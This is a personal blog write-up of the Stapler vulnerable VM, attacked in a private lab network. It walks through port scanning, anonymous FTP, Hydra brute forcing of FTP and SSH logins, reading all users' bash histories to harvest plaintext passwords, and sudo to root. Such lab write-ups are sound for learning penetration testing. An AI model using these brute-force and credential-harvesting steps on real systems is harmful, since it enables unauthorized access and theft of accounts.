Staple Walkthrough

After I finished the walkthrough of Mr.robot, I decided to do another one, in this post I will show you the walkthrough of Staple, the author is g0tmi1k

attack machine: 192.168.56.102  
target machine: 192.168.56.104  

use Nmap check the open port and services:

Nmap scan report for 192.168.56.104  
Host is up (0.00041s latency).  
Not shown: 992 filtered ports  
PORT     STATE  SERVICE  
20/tcp   closed ftp-data  
21/tcp   open   ftp  
22/tcp   open   ssh  
53/tcp   open   domain  
80/tcp   open   http  
139/tcp  open   netbios-ssn  
666/tcp  open   doom  
3306/tcp open   mysql

Nmap done: 256 IP addresses (2 hosts up) scanned in 50.05 seconds  

I always like to have a try on port 80, but failed, I only got two files, bashrc and profile, but nothing got.
80no There must be something I missed, so I check more ports:

Nmap scan report for 192.168.56.104  
Host is up (0.00055s latency).  
Not shown: 65523 filtered ports  
PORT      STATE  SERVICE  
20/tcp    closed ftp-data  
21/tcp    open   ftp  
22/tcp    open   ssh  
53/tcp    open   domain  
80/tcp    open   http  
123/tcp   closed ntp  
137/tcp   closed netbios-ns  
138/tcp   closed netbios-dgm  
139/tcp   open   netbios-ssn  
666/tcp   open   doom  
3306/tcp  open   mysql  
12380/tcp open   unknown  

I find another port 12380, check it in the browser:
12380 use nikto for more information

evilc@evilc:~$ nikto -h 192.168.56.104:12380  
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2017-06-24 17:43:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.56.104' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2017-06-24 17:45:57 (GMT-4) (176 seconds)

it seems this website use SSL and has two directories, /blogblog and /admin112233, so I switch to https to check these two directories:
admin112233 the /blogblog give me something new:
blog I check around, find a use john, but cannot brute force its password.
So i choose another way: ftp

evilc@evilc:~$ ftp 192.168.56.104  
Connected to 192.168.56.104.  
220-  
220-|-----------------------------------------------------------------------------------------|  
220-| Harry, make sure to update the banner when you get a chance to show who has access here |  
220-|-----------------------------------------------------------------------------------------|  
220-  
220  
Name (192.168.56.104:evilc): anonymous  
331 Please specify the password.  
Password:  
230 Login successful.  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp> ls  
200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.  
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.  
ftp>  

download this note, and check it

evilc@evilc:/home/stapler$ cat note  
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.  

Well, at least I got another username elly.
use hydra brute force it (I hate it)
but successed...

evilc@evilc:/home/stapler$ hydra -l elly -e nsr ftp://192.168.56.104  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-24 17:55:59  
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.56.104   login: elly   password: ylle
1 of 1 target successfully completed, 1 valid password found  
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-24 17:56:02  

login as elly with password ylle, find a lot of files.
download passwd file, extract all the username for ssh brute force.(again, I hate it)

evilc@evilc:~$ cat passwd | cut -d ":" -f 1 > username  
evilc@evilc:~$ cat username  
syslog  
_apt  
lxd  
dnsmasq  
messagebus  
sshd  
peter  
mysql  
RNunemaker  
ETollefson  
DSwanger  
...
evilc@evilc:~$ hydra -L username -e nsr ssh://192.168.56.104  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-24 18:00:22  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.56.104   login: SHayslett   password: SHayslett

use SHayslett with password SHayslett

evilc@evilc:~$ ssh SHayslett@192.168.56.104  
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
SHayslett@192.168.56.104's password:  
Welcome back!


SHayslett@red:~$ id  
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)  

walk around the system, I see lots of user in home directory.
Check bash_history.

SHayslett@red:~$ find /home/ -name .bash_history > history  
find: ‘/home/peter/.cache’: Permission denied  
SHayslett@red:~$ cat history  
/home/MFrei/.bash_history
/home/Sam/.bash_history
/home/CCeaser/.bash_history
/home/DSwanger/.bash_history
/home/JBare/.bash_history
/home/mel/.bash_history
/home/jess/.bash_history
/home/MBassin/.bash_history
/home/kai/.bash_history
/home/elly/.bash_history
/home/Drew/.bash_history
/home/JLipps/.bash_history
/home/jamie/.bash_history
/home/Taylor/.bash_history
/home/peter/.bash_history
/home/SHayslett/.bash_history
/home/JKanode/.bash_history
/home/AParnell/.bash_history
/home/CJoo/.bash_history
/home/Eeth/.bash_history
/home/RNunemaker/.bash_history
/home/SHAY/.bash_history
/home/ETollefson/.bash_history
/home/IChadwick/.bash_history
/home/LSolum2/.bash_history
/home/SStroud/.bash_history
/home/LSolum/.bash_history
/home/NATHAN/.bash_history
/home/zoe/.bash_history

read all the files:

SHayslett@red:~$ for file in $(cat history); do cat $file | grep -v exit ;done  
free  
top  
ps aux  
id  
cat: /home/peter/.bash_history: Permission denied  
id  
cd /root  
ls  
cat flag.txt  
id  
whoami  
ls -lah  
pwd  
ps aux  
sshpass -p thisimypassword ssh JKanode@localhost  
apt-get install sshpass  
sshpass -p JZQuyIN5 peter@localhost  
ps -ef  
top  
kill -9 3747  
sudo -l  
cat /etc/sudoers  
su peter  
whoami  
top  
SHayslett@red:~$  

got another two username and password.
try peter, get a new shell with peter privilege, check it:

--- Type one of the keys in parentheses --- 

Aborting.  
The function will be run again next time.  To prevent this, execute:  
  touch ~/.zshrc
red% id  
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)  
red% sudo -l

We trust you have received the usual lecture from the local System  
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Matching Defaults entries for peter on red:  
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:  
    (ALL : ALL) ALL
red%  

OK, peter can do everything like user...
So I switch to root

red% sudo su  
➜  SHayslett id
uid=0(root) gid=0(root) groups=0(root)  
➜  SHayslett cd /root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql  
➜  ~ cat flag.txt 
~~~~~~~~<del><(Congratulations)></del>~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

➜  ~ ]

Amazing

Done, but the author says there are at least 2 ways to get a limited shell and at least 3 ways to get the root shell.
I will try other ways in the future post.